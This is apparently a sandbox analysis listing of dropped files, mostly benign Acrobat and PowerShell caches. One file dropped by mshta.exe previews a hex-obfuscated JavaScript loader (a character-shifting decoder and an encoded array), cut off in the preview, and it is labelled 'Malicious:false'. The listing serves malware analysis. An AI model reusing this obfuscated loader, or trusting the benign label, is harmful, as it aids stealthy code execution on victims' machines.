                                                                                    SHA-512:56309FCCFEBA47E66A0417B48C5A89855EE67EC0DB9AD3A8AEEF5C4431F0C2D71325E80FAB274BF5FC947AB5F36C881129894A9B6D82AC98A428A9E1041DE586
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):1123
                                                                                    Entropy (8bit):5.681328575253992
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:Yv6Xx27UXhupLgE9cQx8LennAvzBvkn0RCmK8czOCCSc:Yvb7whuhgy6SAFv5Ah8cv/c
                                                                                    MD5:3032638BA612EB468D98D8D1F5B91833
                                                                                    SHA1:355346C2B4923F51D8455C49DF510859DB6DC67E
                                                                                    SHA-256:6712A3A78D170D0842CDD7DBACD7278A7B54CB599FFD4103B9FA83352B20A21D
                                                                                    SHA-512:D4ED3634F5499AC39443251EFC87DA017A609A17777A8E481D1F60C5AD6CB458DE750F77EAF0CD089633C6916951AAD95C68D5B5003628BF09BEF2562187C3D0
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):289
                                                                                    Entropy (8bit):5.279801808550012
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJf8dPeUkwRe9:YvXKXx27UTbdfpGU8Ukee9
                                                                                    MD5:9D7B2FB93EF5F3A56FB264D9665335EE
                                                                                    SHA1:444A8DF9146E770F2570BCA4EDB6EF36EA46DB87
                                                                                    SHA-256:17B8332A7DE9128038E7F64588B47DD4FCE85B441F2C064737B5F9948F3AC454
                                                                                    SHA-512:6437C5E3C12DA24A8B3147C3C0DBD794062F30D59D5DDC5D8527BAC33D73E967C09673185DEA593374507BFA9F4B3E08F7838A33A6E9784391D66D02C7900E94
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):292
                                                                                    Entropy (8bit):5.2826615763584215
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJfQ1rPeUkwRe9:YvXKXx27UTbdfpGY16Ukee9
                                                                                    MD5:1A8E2B2E4574E19D03D22E3AA0416875
                                                                                    SHA1:2AD630844AF3B723C924FFA4E3341AFB96768C1F
                                                                                    SHA-256:265A5CB9981389CFADF30F1F02955A8B5765C9B1F6280F3376D7EF5947529C8E
                                                                                    SHA-512:1C2CF2A732FF2C0E871C366E33E9331D886D75B1669B364AE9F106607F5B9A246253CCE84A22C8E8A0FEFE1701D76D9CF0EECD29A7D2118C1C9888F18F0E2DA1
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):289
                                                                                    Entropy (8bit):5.293213530810161
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJfFldPeUkwRe9:YvXKXx27UTbdfpGz8Ukee9
                                                                                    MD5:0FC4DEA64084C846D27071A98B9317C5
                                                                                    SHA1:6A54FAD0BBBCCD867703AA4FC47778B2658E8DAA
                                                                                    SHA-256:7163A51CC7E17754BE0DBA5A99E400EDDDC525F4BF324491B8B3B774F94F1120
                                                                                    SHA-512:7F8AAF38E0859ED335B2AA67A32072BC190F86E040D7E1292D188F88D0945289A07CEEDD0B09C0E083F8B5BB53957E7391B8B988C29735187310A438FC1ABF42
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):295
                                                                                    Entropy (8bit):5.307197893036764
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJfzdPeUkwRe9:YvXKXx27UTbdfpGb8Ukee9
                                                                                    MD5:7D4670C2DE05585A04A5A5DC8FFC67A7
                                                                                    SHA1:E8EC4DBDD02F3B0C3EF1C7AB72CFFCC94F9A6B17
                                                                                    SHA-256:BA6C47F0931D27F8A3DEBA0EC41593965DFF4EBA709354A9C1A42F2936BCC0E3
                                                                                    SHA-512:24DD225EC17202D72F637978FB8BE834E0BF234599B5952574464E4B358BF6A18586E63231B26293A07606A739EFAD841F90D669712FA2F5B5AFCEFF70DA4428
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):289
                                                                                    Entropy (8bit):5.287589060145085
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJfYdPeUkwRe9:YvXKXx27UTbdfpGg8Ukee9
                                                                                    MD5:824E5D3DBB9DA94D230AB9205B060E21
                                                                                    SHA1:8D512485BD4DC65300CDBD434256D2187E562F63
                                                                                    SHA-256:2DF649E1BA603A81AE319E69724861D38FADB6D2DCA6FF3B648875BB57F04153
                                                                                    SHA-512:CBCC3B249E381D4FAF98D1C0BBA3B71537CB9B354A99A23ED3944DA7FBF8754E472AC03089C40FA4A3CE3792A3859271307C6CECC2761D460743C0B8D90AD144
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):284
                                                                                    Entropy (8bit):5.273719921433366
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJf+dPeUkwRe9:YvXKXx27UTbdfpG28Ukee9
                                                                                    MD5:73E0F2AEE96743CBD6BE2244F58680B2
                                                                                    SHA1:DC357D2A899B15F5557DAF8A7AA231E56B0A729E
                                                                                    SHA-256:BB12CF7D5748DE7443333950D0F69F9FB3CE2398FAF36976EE35B7A05BDA1A21
                                                                                    SHA-512:83A34E69AFAA511456BBF93CC74AE5EEA211B3C35D9A8C1807158B344E57B64CFB75A569C81711904AF7BB29E51551682A59FFF5989B51CF034E23C2256436E1
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):291
                                                                                    Entropy (8bit):5.2712214563746524
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJfbPtdPeUkwRe9:YvXKXx27UTbdfpGDV8Ukee9
                                                                                    MD5:8F87340DF7C1FF44EB66090CF78F4F19
                                                                                    SHA1:BE5C5C386CCBD0D0C82B322410654658174BA689
                                                                                    SHA-256:7B8FD9A1356E745CC59A328EAB974BF57DAAB78CEC9F1E78618E2CC998540B28
                                                                                    SHA-512:48ECBA18CACEB0C5D6AC01AC7B99E8EA5C4F72AF50EB0BDEB4E03A49408D26C1DE9AEB4DB403AC62DB0E3BF7843836A9FB24E18E121F068F7551E5E40C895EC3
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):287
                                                                                    Entropy (8bit):5.274430990746776
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJf21rPeUkwRe9:YvXKXx27UTbdfpG+16Ukee9
                                                                                    MD5:F93B8D2C8D8533C638A17C483F2B5EDC
                                                                                    SHA1:8BB73375C92D16544AD2B1383CF00B9AB97717CC
                                                                                    SHA-256:FC61F7967F43A8698549096E507C123FD64A2CF56BE141005AAB697EFF78172F
                                                                                    SHA-512:CCE88087D0CCB72BFB0E8CF2AB2BFA1C140FCDF9430557ACA2708A2169407FFBAE8F461C35F36EF5D4716BFE9863C4BAA3C172951982EB33DFD4B46372259582
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):1090
                                                                                    Entropy (8bit):5.656883458337031
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:Yv6Xx27UXhyamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSc:Yvb7whMBgkDMUJUAh8cvMc
                                                                                    MD5:0009E494BE0996F258A691F85970B44E
                                                                                    SHA1:2708E60576AACD3964E4C85137F1F0C9B97EA328
                                                                                    SHA-256:F36989B1915C180C3C4081CDC9CF238632F9D962E0C9B2A04F87B5EC0A5297E2
                                                                                    SHA-512:0D45D8B15306CCD232C09B57460791F9762C7E094D5A1EB4662952C31EBF708A13DDF9D027DC3BD269C718D4A65463AE1975571B974444905169E74A2652BD8F
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):286
                                                                                    Entropy (8bit):5.25002419840715
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJfshHHrPeUkwRe9:YvXKXx27UTbdfpGUUUkee9
                                                                                    MD5:BF30EBC11C34A3AD31E94F0D86025E42
                                                                                    SHA1:E684452B6522CC77C023DA44D052C4E1485132D1
                                                                                    SHA-256:CA411127AF4680FAAE81111E3DED7FDBD44A9242E07D81EC3786748063ED530D
                                                                                    SHA-512:9162BFB891296F0E4F4BF8EE84670DFC4E22D4ECEA0700FB2E96A0133D8F02D71D49A6629203380415E3C74512FCBD37762934D39C839E571F7B6121947FEE3C
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):282
                                                                                    Entropy (8bit):5.263610082597559
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:YEQXJ2HXw+27UXjb24kF0YCaoAvJTqgFCrPeUkwRe9:YvXKXx27UTbdfpGTq16Ukee9
                                                                                    MD5:717EE323E9874F13543629388F6BE591
                                                                                    SHA1:90C3C5E5F57917C35ACC207A26501BAFE0BB55C2
                                                                                    SHA-256:92067A9B0905992653E2FC81B1EEFEBBBD3FA859EAF96A608CEEB1941491AAC5
                                                                                    SHA-512:960CB3EB136E79B5088005FD69812DA729522773AD37C8E78BFD84E6026424D00F29EE85B4EF41F1CD886E1C21B26351D3D70C6BBCA77323013186E526899B0D
                                                                                    Malicious:false
                                                                                    Preview:{"analyticsData":{"responseGUID":"e206b5fb-8aad-456c-8f56-c91556decc10","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734599374398,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):0.8112781244591328
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:e:e
                                                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                    Malicious:false
                                                                                    Preview:....
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):2814
                                                                                    Entropy (8bit):5.125293724967405
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:Y3CKyJ9mnaS/ayc7ZYjDxj0SXcmmB3k2EoVmX2P2LSBCw6gx81MiDc5pq94Sauij:YHIujZjct1kv1eD56g2MvK9xu
                                                                                    MD5:E4E7A31B45BAC630BF24BD7A8D5ECC7F
                                                                                    SHA1:DE5B08DD900D2A30ECF364E27D3A8C82C623CE08
                                                                                    SHA-256:72A69DCF9182BF14A983764108AEB1CCC34DB5F31425DB1861DCFF4E63EEF62F
                                                                                    SHA-512:DA217B93B0C7A703847F17CC48A73058BCDA12371C48C741BD9ACA35A13BAB5033B25C3462A3185AFAB650116BD7FD510CB11617BB45EE813D5C82F589EECDA2
                                                                                    Malicious:false
                                                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"4348e8889418299e381bb514a7c4d428","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734421114000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"7878596312768a723eab0173ed0075b4","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734421114000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"16f4c5b883f4c7c8a5ed541f4bea6681","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734421114000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"248d656a0c77a8628a28be45e8b26773","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734421114000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"e804f9d38fa37c0f9a00a351ba1f8744","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":289,"ts":1734421114000},{"id":"DC_FirstMile_Home_View_Surface","info":{"dg":"9af4bcc236d99cf165e22337b520496c","sid":"DC_FirstMile_Home_View_Surface"},"mimeType":"fil
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                    Category:dropped
                                                                                    Size (bytes):12288
                                                                                    Entropy (8bit):1.3195252385867497
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:TLKufx/XYKQvGJF7urs9O3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6Y8cQL+EXSq3:TGufl2GL7msUKB0M0+Tb608Y8cdrEck
                                                                                    MD5:6179013E0811599015C1E0B4D35B1287
                                                                                    SHA1:7E4106C72070290163530F2B40CC10EE1BD25C74
                                                                                    SHA-256:C82E340AD9B87D6F504D22EE5F337C94C49A0791F03B5CB4587CACA1C496C57F
                                                                                    SHA-512:193B7BA0C9C7F92F531F7BE9C01A6B8BD7BA1937E7FE41B703D0E8AB98DA43A79253A5E02D0D4B9DC81D0BD099DA9C13D968EB669DF105C4275706494B3345AC
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:SQLite Rollback Journal
                                                                                    Category:dropped
                                                                                    Size (bytes):8720
                                                                                    Entropy (8bit):1.781863333196261
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:7+t5lwl3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6Y8cQL/EXSqXlyGKaizTqLhx/O:7MeKB0M0+Tb608Y8cQrGKrqFl2GL7msE
                                                                                    MD5:261F1BB63146E039EFCC0B6685EC9443
                                                                                    SHA1:735A44548AE5D14F34D91BA032B1784C59CAF728
                                                                                    SHA-256:8F975E64E4827FEE69646D5054B051CA050A35C30096B32D9D2B8C62BA69BECF
                                                                                    SHA-512:4360646B316F1A7D17F621FB0A1409CF1519FC2915BEA855609748A1527F6F39CFAEA9ABBFB6F8B973515DA9FCF59DB6B00CA59AE3162FCC2AEA6681487935B9
                                                                                    Malicious:false
                                                                                    Preview:.... .c...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):66726
                                                                                    Entropy (8bit):5.392739213842091
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:RNOpblrU6TBH44ADKZEgXAE4HYwYjE0RVysYLCK0ceucBPjYyu:6a6TZ44ADEXA+wYjESVyPAhjK
                                                                                    MD5:44649BCD61CEF522EC5992E288D33D75
                                                                                    SHA1:C0BE50B20F142B59C873D2D0FE86A3446E3DE793
                                                                                    SHA-256:06BAA8F0F610F5A359A876AA2D723260977169AD4B82BC27190FF625292664FE
                                                                                    SHA-512:377E3A55B66BCB9CF01CBFBE50A5759C3CD945C459E9D3517B4A89F5E1E7A99BC7187E7FA546C2EC07C0AC4AC90CA885827E1D224F2559ADB54526B2911A7C48
                                                                                    Malicious:false
                                                                                    Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                    Process:C:\Windows\System32\mshta.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):340566
                                                                                    Entropy (8bit):2.46301304463595
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:uNu43WE4aoEhcQFQRQFQJQNQFQWQMQRQ5Q7Qu:uNF3WE4aFdaWa+yajNWuEu
                                                                                    MD5:0482ADC1DD52998E62BA661EBA48B282
                                                                                    SHA1:BCBCE44B94B015EC03A1B6B1FA96070145C08D81
                                                                                    SHA-256:40A02D0FEFF6404CE7D5D72CF6B15B84DC326D5169505D366EBBACCFDC5E3458
                                                                                    SHA-512:923A68E6E6033A846BF407D1B17FE9BFE50AF6EE3FE0ADC3F22905ABF12CD36537F96C5BA84541299CD3ABE927255E8DB973D4D038159B2DDA08084D574D6F94
                                                                                    Malicious:false
                                                                                    Preview:66N75T6ev63j74A69V6fz6eV20w67M61t6fo59U63p28t66w6eu44w77p45K50f29p7bK76f61S72D20W49W67B63P4dR49S3dx20y27L27J3bM66x6fc72q20J28o76D61s72h20r4bT41O46D61I20U3dP20Y30T3bK4bY41I46Q61Q20x3cz20d66T6eh44u77b45q50W2ee6ck65k6ex67U74z68A3br20l4bS41x46b61k2bH2bT29t7bv76C61t72e20n4dn4fA64v71g20f3dq20g53V74V72x69F6eA67w2ek66T72Y6fW6dv43Z68S61T72m43q6fS64p65M28r66K6ea44m77s45h50M5bj4bq41j46o61R5do20I2dU20V31Q38U35s29b3bn49X67A63V4dY49G20U3dL20T49A67J63d4dq49S20z2bW20u4di4fF64Y71n7dM72t65j74k75E72G6eR20x49x67V63W4da49O7dZ3bU76K61F72N20m49N67A63P4dp49a20K3da20W67I61y6fb59h63O28T5bn32a39e37Q2cl32U39z36D2cO33W30f34n2cC32c38t36f2cL32p39U39T2cK33m30x30D2cJ32Z38d39k2cI32y38W36n2cH32G39a33y2cp32t39U33t2cm32K33m31t2cK32m38I36x2cc33d30m35m2cN32v38J36A2cd32a31H37L2cq32O33u30P2cz33r30g34w2cC32v31p37S2cU32b33g34A2cA32D31t37W2cR32f33H30e2cL32k38a36M2cx32Z39U37P2cl32I31C37X2cP32X37u30T2cG32L39v35h2co32U39R39l2cO32J38A36Z2ch33k30u30K2cH33Q30D31P2cQ32T39y39c2ca32a39g30M2cY32J38k34d2cJ33Z30Q31F2ck32Z38q36r2cT32p38x35o2
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):11608
                                                                                    Entropy (8bit):4.890472898059848
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                    MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                    SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                    SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                    SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                    Malicious:false
                                                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):0.34726597513537405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlll:Nll
                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................
